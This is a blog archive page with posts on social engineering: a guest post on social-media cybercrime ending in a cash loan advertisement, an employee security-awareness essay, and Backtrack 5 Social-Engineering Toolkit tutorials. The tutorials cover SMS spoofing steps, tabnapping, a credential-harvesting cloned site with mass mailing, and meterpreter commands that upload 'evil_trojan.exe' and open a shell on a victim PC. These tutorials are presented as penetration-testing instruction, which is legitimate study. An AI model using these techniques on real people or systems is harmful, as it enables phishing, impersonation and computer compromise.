Affichage des articles dont le libellé est Social engineer. Afficher tous les articles
Affichage des articles dont le libellé est Social engineer. Afficher tous les articles

Cybercrime Now Goes Social

In the current generation everyone should know about the word “Cybercrime” as it includes spyware, computer viruses, fake links that could capture our personal information, online bullying, bank accounts fraud and many more. It is the scam which is used to gather personal information without the owner’s knowledge. Before people used to target desktops for tracking personal data but due to advancement in mobile phone hackers are preferring mobile phones and social networking sites. 



The usage of social networking sites like Facebook, Twitter, Yahoo etc., has increased drastically with which cybercriminals are also looking forward to these sites. We upload videos, pictures and share our personal details. We also add friends and family members to our accounts. We see many advertisements and applications on social media, which usually scam users. These are also called Phishing links; if you click onto this link you will get a new page asking email id and password. As soon as you enter a user name and password, your account gets hacked then it can be misused by applying to Gmail, PayPal and other accounts. A survey says that nearly 5 out of 10 people are falling victims to this fraud. There are many reasons behind this such as:

  • Nearly 33% of people don’t log out their accounts from a session.
  • There are 36% of people who accept friend requests from strangers.
  • Many people don’t check and click on unknown web links which leads to “Phishing”.
  • Not having knowledge about privacy settings to secure their accounts.

To overcome such problems and to protect your accounts, you should take some useful measures like to avoid unknown friend requests, good privacy, ignoring Phishing links etc. Always make sure to change your passwords often and use lengthy passwords. People can even opt for threat management appliances in order to overcome cyber-attacks. This is a recently developed solution for industries based on network securities which has multiple features like anti-spam, filtering content, prevention of data leakage and so on. 

For example, Cyberoam Unified threat management (UTM) appliances are offering solutions for large, medium and small enterprises with comprehensive features. All the specifications are integrated on a single platform. Cyberoam UTM offers security from layer 1 to layer 8. It ensures effective network security, connectivity, availability and controlled network access to customer, partners, telecommuters etc. The highlights of this tool are it shifts from firewall to unified threat management security, layers from 1 to 8, VPN, IPS and advanced network security.

Similarly there are many UTM’s available on the market such as Endian, Extensible, Hewlet Packard 200 UTM for effective and high network security. These devices can be installed in your enterprises to overcome the problem of cyber-attacks. The prices of UTM’s vary from one brand to another and are not much expensive. If you are short of cash to purchase these tools then you can opt for same day cash loans for getting instant money. Hence it is necessary to ensure security processes and stay away from Cyber-crimes.

About the Author:

The guest post was contributed by Alicia, financial guest blogger from Manchester, UK. Find out more about her finance related blogs at financeport

~ lundi 5 novembre 2012 0 commentaires

How to Prevent Social Engineering Attacks

This post is about social engineering. It will cover some of the dangers of social engineering and focus more on what a corporation or a company can do to help better prepare their employees for those kinds of situations.









Security Awareness Training

The most important and something we don’t do enough is the basic security awareness training. Employees need to be aware of certain situations that look odd, keep them ingrained with understanding that even if they don’t want to admit it or don’t like the fact, they are part of
the security team. Every employee no matter what their function is – they also have the duties of protecting the company and protecting the company’s assets. That’s part of their job. If the company goes out of business because of compromised info, they no longer have employment. It is in their best interest to make sure that the company is secured so that they can continue making money and keep paying people their salaries.

Positive Reinforcement

When we mean security, we’re very good at talking about how bad things can be and how wrong it is and how someone has done something wrong, but when you’re trying to give security
awareness training to an employee, that’s not the best avenue of approach. Managers need to start educating their employees and give them positive reinforcement. When an employee does something good, like question someone before they’re trying to get into the door behind
them – reward them, make notice of that: “You did a good job,” it’s like: “We’ll print it in the company’s newsletter saying you were recognized for being security conscious.”
They react to that. People react to being positive. And also it becomes competitive, because now Susan saw James recognized as security conscious person, he got the recognition. Well, now she’s going to want that recognition too, so she’s going to keep an eye up for an opportunity to catch someone or do something that is insecure. It’s important to focus on that kind of competition, it is important to empower people to try to be secure and security conscious.

Constant Reinforcement of Security Ideals


It doesn’t always have to be a pen test. Cordially, pen tests are not going to save you. Constant reinforcement of security ideals and security practices are what’s going to keep you safe. It’s ideal to have an employee just walk through the area making sure the Clean Desk Policy is being enforced, making sure no passwords are written underneath the keyboard, making sure they’re not posted on the monitor, doing those kinds of things.

Because even if you find nothing, people see that, and in that instance they realize: “Oh, they’re looking to make sure the area’s secure. I have to keep making sure my area’s secure as well, because I don’t want to be called out in a negative way saying that I was doing something
unsecure, because that would go to my manager, my supervisor.”

Even if they don’t find anything, they’re promoting in a passive way security awareness and the security conscious environment. It’s not those little things when humans can be patched every second Tuesday of the month. It has to be a constant kind of awareness, constant kind of environment where you show that. 

Equality

And what is good for the lowest mailroom or janitorial staff, any entry level positions – it has to go for the CEO and the CIO of the company too. Top managers have to live to that kind of ideal too.

If company is compromised, it mostly happens from the CEO. Because when the bad guys are attacking, when they’re going after your company – they’re not going after the mailroom, they’re not going after the clerk or the entry level person, they want to go after the CEO, they
want to go after the CIO. Why? Because usually top managers think they deserve an exception to the security policies. They may not need antivirus software updating all the time because they crash the system or it runs too slow. They don’t have to use the two-factor authentication token, they just have to use their password. They don’t have to have the password minimal length and special character requirements everybody else in the company does. They just want it to be their first name so that it’s easier for them to get in.

And when the company is compromised, they’re not going to come back and say: “Oh, my bad.” They’re going to be: “Why didn’t you protect me from myself? Why weren’t you doing the job that was protecting me from me harming the company?” So that’s one of our responsibilities as
well, telling the executives things they may not really want to hear. But that’s what we have to do, because we’re trying to protect the company from the human element.

Socially Engineer Your Employees

Basically you want to socially engineer your employees and your environment in order to protect the company from social engineering. Make the people more conscious, suddenly change the environment so that people are more suspicious, that they are more questioning of what’s going on. They must question things that may be out of the ordinary.

Usually after compromising a network or a company, most pen testes see and feel by people’s facial expressions, by their body language that they were suspicious but still let the intruders in. Later on, after the pen test workers say: “Yeah, I knew there was something not quite right, but he said he was supposed to do this, I didn’t want to challenge him.”

It is guaranteed next time they’re going to challenge. Next time, and it is part of inoculation, it is giving them that encouragement, giving them that kind of courage to stand out and say: “Hey, this doesn’t seem right. I’m going to question you.” People need to understand they have to do something in such situations, call the security, call the police, call someone, react to it in some way, not just ignore it. And that’s one of the key things that employees have to understand. They don’t necessarily have to confront the situation, but it is an imperative and part of their responsibilities to report the situation.



Author Bio

Alex Lamman is a 25 years old software engineer, snowboarder and just a loving father from Germany. He is Internet security addict and helps to run Privacy PC – a website which guides you through security and privacy news, tips and antispyware software reviews.





Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.

~ samedi 21 juillet 2012 0 commentaires

SMS Spoofing Tutorial- SET Backtrack 5

Mobile communication is now everywhere, mobile hacking is seems to be difficult and a normal user, student and ethical hacker usually don't go towards the mobile hacking field. Mobile hacking is so general word and it contains hacking attack from physical layer to application layer of OSI model. Spoofing attack is not a new attack and you must have heard about IP spoofing, DNS spoofing and SMS spoofing. 

In spoofing attack an attacker make himself a source or desire address. As previously discussed DNS spoofing by using Ettercap, this time we will discuss SMS spoofing by Social engineering toolkit on backtrack 5.

What Is SMS Spoofing?

Short message service (SMS) is now available on mobile phones, I, You and everyone using SMS for the communication. SMS spoofing means to set who the message appears to come from by replacing the originating mobile number (Sender ID) with alphanumeric text/ another number. (Wikipedia).
I will discuss most of the theorical aspect here like how to perform SMS spoofing? How SMS spoofing work? And so many question.

SMS Spoofing Tutorial


Social engineering toolkit contain a SMS spoofing attack vector that can used to perform SMS spoofing. Requirement for tutorial:
  • Operating system (Backtrack 5 for this tutorial)
  • SET (Social engineering toolkit)
  • A Brain (important)
So I will use backtrack 5 to perform SMS spoofing however you can use Ubuntu, Gnacktrack, Backbox and other Linux or other OS.
  • On the SET menu select number 7 that is SMS spoofing attack vector.
  • On the second step “1. Perform a SMS Spoofing Attack”
  • On the third choose what you want to do a Mass SMS spoofing or a single in this case I select 1.
  • On the fourth you need to enter the number of the receiver, make sure to enter with country code.
  • On the next step 1. Pre-Defined Template
  • On this step you need to choose the templates (choose what you want)
  • If you have a android emulator that wonderful but you can use some paid services. So its up to you select and than send your message.


Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.

~ samedi 15 octobre 2011 0 commentaires

Tabnapping Tutorial- Social Engineering Toolkit Backtrack 5

Social engineering toolkit is complete toolkit that contain relevant tools that will really help penetration tester and ethical hacker in the process of auditing and penetration testing. As discussed before about different aspect of social engineering toolkit on backtrack 5 like, credential harvester attack method and others. For this article I will discuss the famous attack called tab-nabbing (tabnapping).



What Is Tabnapping ?

Tab-nabbing (tabnapping) is a browser side attack in which an attacker takes an advantage of a browser tabs. Now a days most famous browser has a feature called tabs we can open multiple tabs on a same window.

Tabnapping attack is not a new attack and we have discussed this before with video demonstration and with tabnapping protection tips.

Tabnapping Tutorial on SET – Backtrack


The tutorial is very easy for all of the learners, instead of providing images and text we have a created a video tutorial so that you can easily understand these type of attack method.
Requirement
  • Operating system (Backtrack 5 used in video)
  • SET (social engineering toolkit)
  • Mind
  • Browser










Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.

~ lundi 26 septembre 2011 0 commentaires

Credential Harvester Attack Method- SET Backtrack 5

Social engineering toolkit has played and is playing an important role in the field of information security and ethical hacking, social engineering means to take advantages of human weakness to hack a computer system or a server. Social engineering toolkit is a computer based software that are also available on backtrack 5.


Backtrack is not only a single Linux distribution that contain SET, other distributions like Gnacktrack, backbox also have SET. On social engineering toolkit tutorial we have learnt how to get meterpreter and shell access on a computer, in this tutorial I will explain you some harvester attack method.

 

What is Credential Harvester Attack Method 

The credential harvester attack method is used when you don’t want to specifically get a shell but perform phishing attacks in order to obtain username and passwords from the system. In this attack vector, a website will be cloned, and when the victim enters in the user credentials, the usernames and passwords will be posted back to your machine and then the victim will be redirected back to the legitimate site.

So for this tutorial I will integrate Mass Mailer Attack with credential harvester attack.

Requirement

  • Operating system
  • Social Engineering Toolkit
  • A brain

Any operating system is applicable for this type of attack but I am using backtrack 5 for this attack, it is a good practice to make a video tutorial instead of images and text so here is the video tutorial of social engineering toolkit mass mailer attack with harvester attack method.

SET Video Tutorial





Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.

~ lundi 5 septembre 2011 0 commentaires

Social Engineering toolkit Tutorial-Backtrack 5

Social engineering also known as human hack, social engineering is an act to manipulate human mind to get the desire goals. Social engineering is a general term and on daily life everyone implement it but usage of social engineering in hacking and penetration testing is little different. The main use of social engineering in hacking is to get the information, maintaining access and so on.

There are various social engineering tips and tricks available on the Internet beside these tips there is a social engineering toolkit available for implement computer based social engineering attack.

What Is Social Engineering Toolkit


In this article I will discuss about the usage of social engineering toolkit on backtrack 5 to hack a windows operating system, but before going to the actual tutorial I want to share the basic introduction of social engineering toolkit that would really help for the beginner.
The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It’s main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
Social-Engineering toolkit available on backtrack like on backtrack 5, backbox, blackbuntu, Gnacktrack and other Linux distribution that are used for penetration testing.

Download



If you are using some other Linux distribution than use the command to get SET.
svn co http://svn.secmaniac.com/social_engineering_toolkit set/

Social Engineering Toolkit Tutorial

Well for this tutorial I am using backtrack 5 and the tutorial will teach you a single method to own a computer by using SET toolkit while more SET tutorial will be post on later articles. For the best result I have made video tutorial so,

As I have said on the video that more command on the article so here is the necessary commands.
ps
The 'ps' command displays a list of running processes on the target.
meterpreter > ps
Download
meterpreter > download c:\\boot.ini
Upload
meterpreter > upload evil_trojan.exe c:\\windows\\system32
Execute
meterpreter > execute -f cmd.exe -i -H
shell
If you want to get the DOS screen of victim PC for downloading and upload your backdoor and other jobs use shell.
meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Enjoy the article than drop your comments.

Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.

~ samedi 13 août 2011 0 commentaires